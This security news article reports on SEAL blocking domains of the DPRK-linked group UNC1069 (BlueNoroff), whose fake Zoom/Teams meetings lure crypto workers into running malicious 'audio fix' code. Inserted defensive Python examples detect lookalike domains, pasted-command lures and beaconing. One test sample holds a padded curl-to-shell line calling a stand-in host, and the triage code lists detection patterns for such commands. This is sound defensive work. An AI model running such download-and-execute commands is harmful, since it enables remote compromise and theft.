SEAL has blocked 164 domains tied to the Democratic People’s Republic of Korea (DPRK)-linked threat group UNC1069, also known as BlueNoroff, in a fresh warning that highlights the group’s increasingly refined social engineering tactics against cryptocurrency and Web3 targets.
According to SEAL, the domains were tracked and wallet-blocked through MetaMask’s eth-phishing-detect project between February 6, 2026, and April 7, 2026.
The organization said the infrastructure was connected to a long-running campaign in which attackers impersonate trusted contacts, schedule fake business meetings, and then trick victims into executing malicious code under the guise of fixing an audio or software issue.
The advisory arrives as security researchers continue to investigate recent supply chain activity, including the compromise of the axios npm package, which showed tradecraft consistent with UNC1069.
Fake Zoom Calls to Target Crypto Firms
While the group has historically focused on cryptocurrency firms, exchanges, venture capital contacts, and high-profile individuals in the digital asset space, the latest developments suggest a broader targeting model that could include open-source maintainers and software ecosystems.
SEAL’s findings show that UNC1069 is not relying on mass phishing or crude lures. Instead, the group runs patient, multi-week social engineering operations through platforms such as Telegram, LinkedIn, and Slack.
In many cases, attackers gain access to previously compromised accounts and resume old conversations with intended victims, leveraging the trust and context already established in those relationships.
That means a target may receive a message not from an unknown sender, but from what appears to be a legitimate conference contact, business development lead, or investor they have interacted with before.
When a compromised account is unavailable, attackers reportedly impersonate credible organizations and create convincing professional backstories.
On LinkedIn, this can involve a fake recruiter or business outreach. On Slack, the actor may build an entire workspace to make the interaction feel real before ever proposing a meeting. SEAL notes that these tactics continue to evolve, making static detection increasingly difficult.
A central feature of the campaign is the use of fraudulent Zoom and Microsoft Teams meetings. After establishing rapport, the attacker schedules a call, often using legitimate services such as Calendly, and may wait one or even two weeks before the meeting takes place. That delay is strategic. It removes urgency, lowers suspicion, and makes the interaction feel routine.
Just before the meeting, the target receives a link that appears to point to Zoom or Teams but actually resolves to an attacker-controlled lookalike domain. Once opened, the fake meeting interface loads directly in the browser and closely resembles the legitimate product.
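The lookalike-domain step is where a pre-meeting check can still catch the lure. The following is an added example, not code from SEAL, MetaMask or the eth-phishing-detect project: it classifies a meeting link as legitimate, lookalike or unknown by allowlisting the real conferencing hosts and then checking the remaining hosts for typosquats (edit distance), a real host name reused as a subdomain, and brand tokens in the name. The legitimate-host list, the brand tokens, the tolerance of 2 and the sample URLs are assumptions made for the illustration.

```python
"""Flag meeting links whose host imitates a real conferencing domain.

Added example, not code from SEAL, MetaMask or eth-phishing-detect. The
legitimate-host list, the brand tokens and the sample URLs below are
constructed for illustration; a production check would consume a
maintained allowlist/blocklist instead.
"""
from urllib.parse import urlsplit

# Hosts (and any of their subdomains) that legitimately serve meeting links.
LEGIT_HOSTS = ("zoom.us", "microsoft.com", "teams.live.com", "calendly.com")
# Brand tokens an attacker is likely to embed in a look-alike name.
BRANDS = ("zoom", "teams", "microsoft", "calendly")
# Edit-distance tolerance for typosquats (zoon.us, z00m.us). Kept small:
# short brand names make larger tolerances noisy.
TOLERANCE = 2


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; inputs are short, so the full table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels). Enough for the TLDs in this example;
    real code should consult a public-suffix list."""
    return ".".join(host.split(".")[-2:])


def classify(url: str) -> str:
    """Return 'legitimate', 'lookalike', 'unknown' or 'invalid' for a URL."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    if not host:
        return "invalid"
    # 1. Exact host, or a true subdomain of an allowlisted host.
    for legit in LEGIT_HOSTS:
        if host == legit or host.endswith("." + legit):
            return "legitimate"
    reg = registrable(host)
    sub = host[: -len(reg)].rstrip(".")          # everything left of eTLD+1
    # 2. Typosquat of an allowlisted registrable name.
    if any(levenshtein(reg, legit) <= TOLERANCE for legit in LEGIT_HOSTS):
        return "lookalike"
    # 3. A real host name reused as a subdomain: zoom.us.meet-join.example
    if any(sub == legit or sub.endswith("." + legit) for legit in LEGIT_HOSTS):
        return "lookalike"
    # 4. Brand token anywhere in the registrable label or the subdomain labels.
    labels = [reg.split(".")[0]] + sub.split(".")
    if any(brand in label for brand in BRANDS for label in labels):
        return "lookalike"
    return "unknown"


if __name__ == "__main__":
    # Constructed sample links; .example and .invalid are reserved names.
    for link in (
        "https://us05web.zoom.us/j/123456",
        "https://teams.microsoft.com/l/meetup-join/abc",
        "https://zoon.us/j/123456",
        "https://zoom.us.meet-join.example/j/1",
        "https://zoom-audio-support.example/fix",
        "https://meet.example.org/room/7",
    ):
        print(f"{classify(link):<11} {link}")
```

The allowlist is checked first so that genuine regional subdomains such as us05web.zoom.us never trip the fuzzy rules, and the fuzzy rules run only against the registrable name, since an attacker controls every label to the left of it. Anything that comes back as lookalike or unknown should be opened in the vendor's native client, typed by hand, rather than from the chat link.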
SEAL said these pages leverage real SDKs and can even display video footage of supposed participants, often drawn from public appearances, podcasts, or previously recorded material.
The realism is important because it removes the usual warning signs associated with phishing, such as requests to install suspicious software or open unfamiliar files.
Instead, the compromise occurs when the victim is told there is an audio issue. The page prompts the user to “fix” the problem, while the attacker simultaneously messages them through Telegram or Slack, reassuring them that the issue is common and easy to resolve.
In some cases, victims are instructed to click a button that downloads a single AppleScript file with the .scpt extension. In others, they are told to paste a command into the terminal. SEAL said the visible code is often padded with harmless-looking text to make the malicious action harder to spot.
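Because the lure works by burying one live command inside reassuring text, the pasted "fix" itself is worth screening before it reaches a terminal. The block below is an added example, not SEAL's tooling: a small triage function that runs a handful of heuristics over a snippet (remote script piped to a shell, AppleScript or .scpt execution, base64-decoded payloads, quarantine-attribute removal, a command hidden behind a long run of whitespace, and a high proportion of comment or echo lines). The rule names, thresholds and the two snippets at the bottom are constructed for this illustration; example.invalid is a reserved hostname that never resolves.

```python
"""Triage a copy-paste 'fix' before anyone runs it.

Added example, not SEAL's tooling. The rules are heuristics chosen for this
illustration and the two snippets at the bottom are constructed samples,
not observed lures (example.invalid is reserved and never resolves).
"""
import re

# Each rule: (finding name, pattern). Names are this example's own labels.
RULES = [
    # curl/wget output piped straight into a shell
    ("remote_script_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    # AppleScript execution or a .scpt file, as in the macOS lure
    ("applescript", re.compile(r"\bosascript\b|\.scpt\b")),
    # base64-decoded payloads
    ("encoded_payload", re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b")),
    # removing the Gatekeeper quarantine attribute from a download
    ("quarantine_removal", re.compile(r"\bxattr\b[^\n]*com\.apple\.quarantine")),
    # eval / sh -c of dynamically built strings
    ("dynamic_shell", re.compile(r"\beval\b|\b(ba|z)?sh\s+-c\s")),
    # a second command hidden after a long run of spaces or tabs
    ("hidden_after_padding", re.compile(r"[ \t]{40,}(;|&&|\|\|)")),
]
MAX_LINE = 160                     # longer lines scroll out of view in chat clients
ECHO_PREFIXES = ("echo ", "printf ")
LAYOUT_ONLY = ("overlong_line", "mostly_inert_text")


def _is_inert(line: str) -> bool:
    """Blank, comment, or a bare echo with no second command on the line."""
    s = line.strip()
    if not s or s.startswith("#"):
        return True
    return s.startswith(ECHO_PREFIXES) and not re.search(r"[;|&`]|\$\(", s)


def triage(snippet: str) -> dict:
    """Return the heuristics that fired for a pasted snippet and a risk label."""
    findings = [name for name, pattern in RULES if pattern.search(snippet)]
    lines = snippet.splitlines()
    if any(len(line) > MAX_LINE for line in lines):
        findings.append("overlong_line")
    inert = sum(_is_inert(line) for line in lines)
    # Mostly comments and echo banners around one live command: padding.
    if len(lines) >= 3 and inert / len(lines) >= 0.5:
        findings.append("mostly_inert_text")
    strong = [f for f in findings if f not in LAYOUT_ONLY]
    risk = "high" if strong else ("review" if findings else "low")
    return {"findings": findings, "risk": risk}


# Constructed samples, not observed lures.
BENIGN_FIX = "sudo killall coreaudiod\n"
PADDED_FIX = (
    "# Zoom audio fix for macOS 14 and later\n"
    "# Step 1: reset the audio daemon (takes a few seconds)\n"
    'echo "Resetting CoreAudio, please wait..."' + " " * 150
    + "; curl -fsSL https://example.invalid/audio-fix.sh | sh\n"
    "# Step 2: reopen Zoom and rejoin the meeting\n"
)

if __name__ == "__main__":
    for label, snippet in (("benign", BENIGN_FIX), ("padded", PADDED_FIX)):
        print(label, triage(snippet))
```

The layout findings (overlong line, mostly inert text) are deliberately kept separate from the content findings: on their own they only warrant a second look, but combined with a piped remote script they describe exactly the padding SEAL reports. A real-world variant of this check would live in a browser extension or chat bot that intercepts "paste this in Terminal" messages rather than in a script the victim has to remember to run.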
From there, the initial script contacts the attacker’s infrastructure and pulls down a second-stage implant. Researchers say the operators are highly protective of that infrastructure, sometimes allowing only a single download per specific victim identifier. If they suspect they are dealing with a security team or researcher rather than a live target, they may shut down the infrastructure entirely.
Once executed, the implant assigns the infected machine a unique identifier, performs basic host reconnaissance, establishes persistence, and begins beaconing to command-and-control infrastructure roughly every 60 seconds. The malware has been observed in Nim-based variants and in native macOS formats.
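A fixed check-in interval of about a minute is one of the few network-visible traits in an otherwise quiet implant. The block below is an added example, not SEAL's detection logic: it groups connection records by (source, destination), takes the median gap between connections as the candidate period and the median absolute deviation of the gaps as jitter, and reports pairs whose jitter is a small fraction of the period. The minimum event count, the jitter ratio and the constructed event series (documentation IP ranges, not captured traffic) are assumptions for the illustration.

```python
"""Spot fixed-interval beaconing in connection records.

Added example, not SEAL's detection logic. The thresholds are assumptions
for this illustration and SAMPLE_EVENTS is constructed, not captured
traffic (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
"""
from collections import defaultdict
from itertools import accumulate
from statistics import median


def find_beacons(events, min_events=8, max_jitter_ratio=0.1):
    """Return (src, dst) pairs whose inter-connection gaps cluster tightly.

    events: iterable of (epoch_seconds, src, dst). For each pair the median
    gap is the candidate period and the median absolute deviation (MAD) of
    the gaps is the jitter; an implant polling every 60 s gives MAD/period
    close to 0, while interactive traffic does not.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in events:
        by_pair[(src, dst)].append(ts)
    hits = []
    for pair, stamps in by_pair.items():
        if len(stamps) < min_events:
            continue                      # too few samples to call it periodic
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        period = median(gaps)
        if period <= 0:
            continue                      # duplicate timestamps, not a beacon
        jitter = median(abs(g - period) for g in gaps)
        if jitter / period <= max_jitter_ratio:
            hits.append({"pair": pair, "period_s": period,
                         "mad_s": jitter, "count": len(stamps)})
    return sorted(hits, key=lambda h: h["pair"])


def _series(start, src, dst, gaps):
    """Build (ts, src, dst) records from a start time and a list of gaps."""
    return [(t, src, dst) for t in accumulate([start] + list(gaps))]


T0 = 1_700_000_000
SAMPLE_EVENTS = (
    # implant check-ins: 60 s period with a second or two of jitter
    _series(T0, "10.0.0.7", "203.0.113.10:443",
            [60, 61, 59, 60, 60, 62, 58, 60, 60, 61, 59, 60])
    # ordinary browsing to one site: bursty, irregular gaps
    + _series(T0, "10.0.0.7", "198.51.100.5:443",
              [3, 120, 7, 900, 45, 2, 300, 15, 60, 1800, 4, 9])
    # a short-lived session: too few records to judge
    + _series(T0, "10.0.0.9", "203.0.113.10:443", [60, 60])
)

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_EVENTS):
        print(hit)
```

Run over an hour of proxy or flow logs this surfaces the 60-second poller while leaving the bursty browsing pair alone. In production the window should be rolling, known SaaS destinations should be excluded before scoring (many legitimate agents also poll on a timer), and the jitter ratio should be loosened if the implant is later seen randomising its sleep, since a deterministic interval is a choice the operator can change at any time.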
Critically, the implant can receive and execute follow-on tasks directly from the server, allowing operators to tailor post-exploitation activity based on the value of the victim.
SEAL said UNC1069’s post-compromise framework is modular and supports a wide range of capabilities. Observed functions include theft of browser-stored credentials, crypto wallet files, seed phrases, API keys, password manager data, Telegram session tokens, SSH keys, and cloud credentials.
The group has also deployed keyloggers, harvested authentication tokens for downstream account takeovers, and replaced legitimate browser extensions on disk with malicious versions.
While macOS remains the primary platform of interest due to its popularity among cryptocurrency professionals, Windows and Linux variants have also been documented.
One of the more troubling aspects of the operation is what happens after the initial breach. Rather than moving immediately, the attackers often remain quiet, allowing the victim to continue normal activity and even reschedule the failed call.
That restraint can buy valuable time for deeper reconnaissance, credential theft, and lateral propagation before incident response teams become aware of the compromise.
SEAL warned that this propagation risk is especially severe because compromised Telegram, Slack, and LinkedIn accounts can then be used to target the victim’s own network of trusted contacts. In practice, that allows UNC1069 to weaponize years of professional relationships and extend attacks far beyond the first infected organization.
The latest domain-blocking effort offers a rare public look at the infrastructure supporting these campaigns. It also underscores a broader defensive problem for the crypto industry and adjacent technology sectors.
Traditional phishing awareness training often focuses on suspicious attachments, fake login pages, or urgent requests. UNC1069’s operations are different: they are slow, credible, conversational, and supported by real-time human interaction.
That makes them significantly harder to detect and far more dangerous for executives, founders, developers, and investors who routinely communicate across open messaging platforms.
Security teams should treat unexpected meeting “fixes,” terminal copy-paste instructions, and browser-based prompts to update audio or SDK components as high-risk behaviors, especially when paired with last-minute conferencing links.
The overlap between social engineering, identity compromise, and malware delivery in UNC1069’s campaigns shows how DPRK-linked operators continue to adapt beyond conventional phishing and into high-trust, high-conviction intrusion paths designed to steal cryptocurrency and sensitive enterprise data at scale.
FAQ 1: What is UNC1069?
UNC1069, also known as BlueNoroff, is a DPRK-linked threat group that targets cryptocurrency and Web3 organizations through highly tailored social engineering attacks.
FAQ 2: How does the attack usually begin?
It typically starts with a trusted or impersonated contact inviting the victim to a fake Zoom or Teams meeting that leads to the execution of malicious code.
Site: thecybrdef.com